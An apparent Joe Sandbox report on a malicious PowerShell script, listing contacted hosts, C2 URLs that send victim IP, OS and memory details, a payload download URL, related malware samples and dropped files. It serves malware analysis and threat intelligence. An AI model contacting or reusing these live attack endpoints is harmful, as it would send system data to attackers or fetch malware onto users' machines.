maxcdn.bootstrapcdn.com | 104.18.10.207 | true | false | - | high
api.ipify.org | 104.26.13.205 | true | false | - | high
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | false | - | high
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884 | true | Avira URL Cloud: malware | unknown
https://goutteuy.com/wp-content/plugins/header-footer/images/NoteTick.exe | true | Avira URL Cloud: malware | unknown
http://api.ipify.org/ | false | - | high
URLs found in memory and dropped files (truncated strings are reproduced as extracted):
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:225:0 | powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1825487978.000000000952C000.00000004.00000010.00020000.00000000.sdmp | false | - | high
http://crl.microsoft | powershell.exe, 00000000.00000002.1821221013.0000000007A0D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://91.206.178.120:5001/script_end?random_number=$randomNumber | notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp; XkgoE6Yb52.ps1 | false | Avira URL Cloud: malware | unknown
https://go.micro | powershell.exe, 00000000.00000002.1817520392.0000000005B55000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://maxcdn.bootstrapcdn.com/ | powershell.exe, 00000000.00000002.1822987917.00000000088E7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://91.206.178.120:5001/script_end?random_number= | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contoso.com/License | powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://tagassistant.google.com/ | analytics[1].js.0.dr | false | - | high
http://91.206.178.120:5001/script_end?random_number=33884$Mnl | powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssl | powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://91.206.178.120:5001/script_start?ip= | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ampcid.google.com/v1/publisher:getClientId | analytics[1].js.0.dr | false | - | high
http://91.206.178.120:5001 | powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://api.ipify.org | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp; notepad.exe, 00000002.00000002.2965988196.000000040A7F9000.00000004.00000010.00020000.00000000.sdmp; notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp; XkgoE6Yb52.ps1 | false | - | high
https://maxcdn.bootstrapcdn.com/l | powershell.exe, 00000000.00000002.1822729964.0000000008880000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://goutteuy.com | powershell.exe, 00000000.00000002.1817520392.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp; notepad.exe, 00000002.00000002.2965988196.000000040A7F9000.00000004.00000010.00020000.00000000.sdmp; notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp; XkgoE6Yb52.ps1 | false | Avira URL Cloud: malware | unknown
http://crl.micro | powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/ads/ga-audiences | analytics[1].js.0.dr | false | - | high
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:225:0 | powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1825487978.000000000952C000.00000004.00000010.00020000.00000000.sdmp | false | - | high
https://goutteuy.com/wp-content/p | powershell.exe, 00000000.00000002.1817520392.0000000005708000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.%/ads/ga-audiences | analytics[1].js.0.dr | false | - | high
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://aka.ms/pscore6lBdq | powershell.exe, 00000000.00000002.1817520392.0000000005351000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css# | powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://getbootstrap.com) | bootstrap.min[1].css.0.dr | false | - | high
https://github.com/twbs/bootstrap/blob/master/LICENSE) | bootstrap.min[1].css.0.dr | false | - | high
http://91.206.178.120:5001/script_end?random_number=33884 | powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://stats.g.doubleclick.net/j/collect | analytics[1].js.0.dr | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1817520392.0000000005351000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssS | powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
104.18.10.207 | maxcdn.bootstrapcdn.com | United States | 13335 | CLOUDFLARENETUS | false
185.211.7.193 | goutteuy.com | Germany | 46261 | QUICKPACKETUS | true
91.206.178.120 | unknown | Poland | 200088 | ARTNET2PL | true
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1617748
Start date and time: 2025-02-18 08:28:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XkgoE6Yb52.ps1 (renamed because the original name is a hash value)
Original Sample Name: 042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635.ps1
Detection: MAL
Classification: mal76.troj.winPS1@3/10@3/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 43
• Number of non-executed functions: 13
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.106, 142.250.185.142, 20.12.23.50, 13.107.253.45
• Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fonts.googleapis.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, www.google-analytics.com
• Execution Graph export aborted for target powershell.exe, PID 6808 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:29:01 | API Interceptor | 44x Sleep call for process: powershell.exe modified
Other samples that contacted the same IPs:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.18.10.207 | http://desifoodcorner.wb4.xyz/ | malicious | Unknown | maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.11632.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.6905.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.32268.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.6905.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.4633.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.21631.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
104.18.10.207 | SecuriteInfo.com.Exploit.Siggen3.17149.14541.xls | malicious | Unknown | netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
185.211.7.193 | Pmw24ExIdx.ps1 | malicious | Unknown | -
91.206.178.120 | oNvY66Z8jp.ps1 | malicious | Unknown | 91.206.178.120:5001/script_end?random_number=91530
91.206.178.120 | Pmw24ExIdx.ps1 | malicious | Unknown | 91.206.178.120:5001/script_end?random_number=66350
104.26.13.205 | R1TftmQpuQ.bat | malicious | Targeted Ransomware | api.ipify.org/
104.26.13.205 | SpacesVoid Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | Yoranis Setup.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | BiXS3FRoLe.exe | malicious | TrojanRansom | api.ipify.org/
104.26.13.205 | lEUy79aLAW.exe | malicious | TrojanRansom | api.ipify.org/
104.26.13.205 | Simple1.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | 2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
Other samples that contacted the same domains:
Match | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
goutteuy.com | Pmw24ExIdx.ps1 | malicious | Unknown | 185.211.7.193
api.ipify.org | oNvY66Z8jp.ps1 | malicious | Unknown | 104.26.12.205
api.ipify.org | Pmw24ExIdx.ps1 | malicious | Unknown | 104.26.12.205
api.ipify.org | SecuriteInfo.com.Win32.Evo-gen.5457.19170.exe | malicious | AgentTesla, GuLoader | 104.26.12.205
api.ipify.org | LmIclOjfqc.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | http://account-5036237.kurhaus-steina.com/ | malicious | Unknown | 104.26.12.205
api.ipify.org | http://account-5078804.kurhaus-steina.com/ | malicious | Unknown | 104.26.13.205
api.ipify.org | https://business.accounts-security-center-overview.com/case | malicious | Unknown | 172.67.74.152
api.ipify.org | https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.org | malicious | HTMLPhisher | 172.67.74.152
api.ipify.org | https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.org | malicious | HTMLPhisher | 104.26.12.205
api.ipify.org | DeepLauncher.exe | malicious | Unknown | 104.26.12.205
maxcdn.bootstrapcdn.com | Pmw24ExIdx.ps1 | malicious | Unknown | 104.18.11.207
maxcdn.bootstrapcdn.com | Jim.flanigan Open annual plan_Catalinamarketing.pdf | malicious | HTMLPhisher | 104.18.11.207
maxcdn.bootstrapcdn.com | 2025 Q1 Staff Pay Adjustment-Handbook.pdf | malicious | HTMLPhisher | 104.18.11.207
maxcdn.bootstrapcdn.com | Attach2.pdf | malicious | HTMLPhisher | 104.18.11.207
maxcdn.bootstrapcdn.com | Attach1.htm | malicious | HTMLPhisher | 104.18.11.207
maxcdn.bootstrapcdn.com | 2025 Q1 Staff Pay Adjustment-Handbook.pdf | malicious | HTMLPhisher
                                                                      • 104.18.10.207
                                                                      Final_Draft_with_without_Removal_Depreciation_Report.htmGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.10.207
                                                                      https://claiim-hadiaah4.resminiid.net/Get hashmaliciousUnknownBrowse
                                                                      • 104.18.10.207
                                                                      https://xsin.it/Pemenang-GiveawayGet hashmaliciousUnknownBrowse
                                                                      • 104.18.10.207
                                                                      GasTechnologyPartnership.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.11.207
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | oNvY66Z8jp.ps1 | malicious | Unknown | 172.67.149.252
CLOUDFLARENETUS | Pmw24ExIdx.ps1 | malicious | Unknown | 104.26.12.205
CLOUDFLARENETUS | Kariny CV.vbs | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Commercial Invoice Confirmation-1132346.vbs | malicious | Unknown | 104.21.16.1
CLOUDFLARENETUS | jjmax il.vbs | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
CLOUDFLARENETUS | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 104.22.74.216
CLOUDFLARENETUS | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 172.67.74.232
CLOUDFLARENETUS | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 104.18.27.193
CLOUDFLARENETUS | FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | malicious | DBatLoader, Snake Keylogger, VIP Keylogger | 104.21.32.1
CLOUDFLARENETUS | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 104.18.27.193
QUICKPACKETUS | Pmw24ExIdx.ps1 | malicious | Unknown | 185.211.7.193
QUICKPACKETUS | INVOICE-No96322.pdf.exe | malicious | Remcos | 185.213.83.33
QUICKPACKETUS | Bukti_Transfer...pdf.exe | malicious | Remcos | 185.213.83.33
QUICKPACKETUS | Hilix.sh4.elf | malicious | Mirai | 185.216.200.208
QUICKPACKETUS | SSA-2025.exe | malicious | ScreenConnect Tool | 193.26.115.242
QUICKPACKETUS | https://www.v1.bgmi-event.freewebhostmost.com/ | malicious | Unknown | 66.78.59.15
QUICKPACKETUS | https://v1.bgmi-event.freewebhostmost.com/ | malicious | Unknown | 66.78.59.15
QUICKPACKETUS | nabspc.elf | malicious | Unknown | 104.166.110.66
QUICKPACKETUS | G1B8T38x7G.elf | malicious | Unknown | 203.159.95.7
QUICKPACKETUS | test.exe | malicious | Discord Token Stealer | 167.88.173.11
ARTNET2PL | oNvY66Z8jp.ps1 | malicious | Unknown | 91.206.178.120
ARTNET2PL | Pmw24ExIdx.ps1 | malicious | Unknown | 91.206.178.120
ARTNET2PL | 4Osfx7gnSx.exe | malicious | DCRat, PureLog Stealer, zgRAT | 185.104.113.237
ARTNET2PL | fqJIOoSp5U.dll | malicious | Unknown | 91.206.178.125
ARTNET2PL | QZzvG5G6VE.exe | malicious | Stealc | 91.206.178.118
ARTNET2PL | mrkjKujfkP.exe | malicious | Stealc | 91.206.178.118
ARTNET2PL | vR19oQpY8c.exe | malicious | Stealc | 91.206.178.118
ARTNET2PL | sql.tmp.dll.dll | malicious | Unknown | 91.206.178.125
ARTNET2PL | UrQrIdRfCg.exe | malicious | Unknown | 185.104.112.62
ARTNET2PL | http://tldbonak.com | malicious | Unknown | 91.206.178.97
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | oNvY66Z8jp.ps1 | malicious | Unknown | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | Pmw24ExIdx.ps1 | malicious | Unknown | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | Commercial Invoice Confirmation-1132346.vbs | malicious | Unknown | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | jjmax il.vbs | malicious | Snake Keylogger, VIP Keylogger | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | malicious | DBatLoader, Snake Keylogger, VIP Keylogger | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
3b5074b1b5d032e5620f69f9f700ff0e | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 185.211.7.193
37f463bf4616ecd445d4a1937da06e19 | Pmw24ExIdx.ps1 | malicious | Unknown | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | Kariny CV.vbs | malicious | Unknown | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | DHL AWB Document_pdf.exe | malicious | GuLoader, Snake Keylogger | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | TxTPu961er.exe | malicious | Amadey, RedLine, Stealc | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | Xw9oZv75Ze.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | hHtR1O06GH.exe | malicious | Amadey, Healer AV Disabler, LummaC Stealer, Stealc, Vidar | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f.exe | malicious | GhostRat | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.Evo-gen.5457.19170.exe | malicious | AgentTesla, GuLoader | 104.18.10.207
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe | malicious | GuLoader | 104.18.10.207
No context

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (65371)
Category: dropped
Size (bytes): 121200
Entropy (8bit): 5.0982146191887106
Encrypted: false
SSDEEP: 768:Vy3Gxw/Vc/QWlJxtQOIuiHlq5mzI4X8OAduFKbv2ctg2Bd8JP7ecQVvH1FS:nw/a1fIuiHlq5mN8lDbNmPbh
MD5: EC3BB52A00E176A7181D454DFFAEA219
SHA1: 6527D8BF3E1E9368BAB8C7B60F56BC01FA3AFD68
SHA-256: F75E846CC83BD11432F4B1E21A45F31BC85283D11D372F7B19ACCD1BF6A2635C
SHA-512: E8C5DAF01EAE68ED7C1E277A6E544C7AD108A0FA877FB531D6D9F2210769B7DA88E4E002C7B0BE3B72154EBF7CBF01A795C8342CE2DAD368BD6351E956195F8B
Malicious: false
Reputation: moderate, very likely benign file
Preview: /*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (2343)
Category: dropped
Size (bytes): 52916
Entropy (8bit): 5.51283890397623
Encrypted: false
SSDEEP: 768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
MD5: 575B5480531DA4D14E7453E2016FE0BC
SHA1: E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
SHA-256: DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
SHA-512: 174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
Malicious: false
Reputation: high, very likely benign file
Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text
Category: dropped
Size (bytes): 247
Entropy (8bit): 5.428842177231087
Encrypted: false
SSDEEP: 6:0IFFm15+56ZRWHMVgjWizlpdUD4uFl8vpAtCIif0RHC:jFMO6ZRoMYW6pSZE6tCrf0Ri
MD5: F5DBA43B69C83A48868FECAD364B5B34
SHA1: 2A536D153CBBEA8037BE9B3DA5F2A51B6DCFB382
SHA-256: 4E05BF034F35EE0FD5263203A049263645F575B4846F721F667BEC6505362063
SHA-512: F767C167FB7D60405558BFB15FB529DDC00C2E2169F8A938D5B7DC18DF4A4D51E4A4CCBD5EECC61732E592393676C288949F6048B526E78149280F226853DFAF
Malicious: false
Reputation: moderate, very likely benign file
Preview: @font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: normal;. src: url(https://fonts.gstatic.com/l/font?kit=memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVY&skey=62c1cbfccc78b4b2&v=v40);.}.

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2704
Entropy (8bit): 5.419927904741295
Encrypted: false
SSDEEP: 48:AKYNSU4xympx4RfoUP7mZ9tK8NTXGiR80xnq7kkyUbaImx10ln0zJ6JAwqgt:AvkHxv/IwBZ2KTXGibdkyGaImM0d6JnZ
MD5: 830C9F7B963F69E7F20BB7ED1862A4B1
SHA1: 0471EE42E94AB40558AF342B903D2CC08FE1E8EE
SHA-256: 78FBDF70062F5163FBD56D49ED15FC2394DB6A646255DF1DD2038A56298D00BE
SHA-512: F66519D1DDA0F2B4DDA4A7A02231C6ECDC800095A6FDFD44C4C85B76ACF5CFB30248BC49C26957D44026F7B55D13AA6522759349E31E5F36A5E83D859C2B0455
Malicious: false
Reputation: low
Preview: @...e................................................@..........X................$.....K.sG.<p..a.......Microsoft.Management.Infrastructure.CimCmdlets..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerS

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7355207156773638
                                                                      Encrypted:false
                                                                      SSDEEP:96:gNmyl133CxH5ekvhkvCCtuwQl6hLAHoBQl6hLAHoe:UR1yZKuwE6hL9BE6hL9e
                                                                      MD5:00706A35609BDB15AEA10311C06D333F
                                                                      SHA1:5492A6CDB297C15BA4E14F556116D567F8E70133
                                                                      SHA-256:C32845148A3129E246F55A9D90DCC8CB35DC6C775A2DF37A424A75007CE447B6
                                                                      SHA-512:50407C918A6B132A03705C2EDA11F758346B3C07B5F607C4E09037B6175F69B7433BA9C78B0904D82712523833770F4ED7DDC87F8B9B97405C556888A221C3FC
                                                                      Malicious:false
